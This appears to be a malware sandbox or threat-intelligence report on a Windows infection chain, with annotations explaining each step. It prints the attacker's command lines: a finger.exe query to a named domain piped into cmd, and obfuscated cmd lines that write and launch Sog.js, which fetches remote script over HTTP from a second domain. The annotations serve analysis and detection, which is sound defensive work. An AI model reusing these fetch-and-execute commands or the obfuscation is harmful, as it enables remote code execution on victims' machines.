Technical Information
- '<SYSTEM32>\finger.exe' ok@60oo4m.debitosativos.buzz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\Sog.js"
- C:\users\public\sog.js
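- '60####.#ebitosativos.buzz':79
- '39####.niyimptgikub.art':80
- '60####.#ebitosativos.buzz':79
- DNS ASK 60####.#ebitosativos.buzz
- DNS ASK 39####.niyimptgikub.art
  (The masked names appear to match the hosts shown unmasked in the command lines on this page: 60oo4m.debitosativos.buzz, contacted on port 79 (Finger), and 39uaer.niyimptgikub.art, contacted on port 80 (HTTP).)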
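- '<SYSTEM32>\cmd.exe' /c finger.exe ok@60oo4m.debitosativos.buzz |more +2 |cmd
  (The Finger response from the remote host is passed through `more +2`, which drops the leading lines of the response, and the remainder is piped into cmd, so the text the server returns is run as commands. finger.exe started by cmd.exe with an outbound connection to TCP port 79 is uncommon on most hosts, which makes it a usable detection point.)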
- '<SYSTEM32>\cmd.exe'
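- '<SYSTEM32>\cmd.exe' /V/D/c "Set RZFC=.j&&sET PZTNI=vE2zdarE2zd a =E2zd 'scE2zdriE2zdptE2zd:'; b =E2zd 'hE2zdTtPE2zd:'; GE2zdetE2zdObjE2zdecE2zdt(E2zda+b+'&&sET A9E6=YOWMSYOWMS39uaer.niyimptgikub.artYOWMS?1YOWMS')&...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p KR1TZ="%PZTNI:E2zd=%%A9E6:YOWMS=/%" 0<nul 1>C:\Users\Public\Sog%RZFC%s"
  (The first command is shown truncated in this report. Its visible part stores a script body in PZTNI with the filler token E2zd inserted between fragments, and a host string in A9E6 with YOWMS standing in for "/". The second command reverses both with `%VAR:old=new%` substitution and uses `set /p` with input from nul to write the result to C:\Users\Public\Sog%RZFC%s; RZFC is ".j", so the file is Sog.js. The visible fragments assemble to a GetObject call on a 'script:' + 'hTtP:' moniker pointing at 39uaer.niyimptgikub.art. The follow-on event is wscript.exe running a .js file from C:\Users\Public, as listed elsewhere on this page.)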
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\Sog%RZFC%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\Sog.js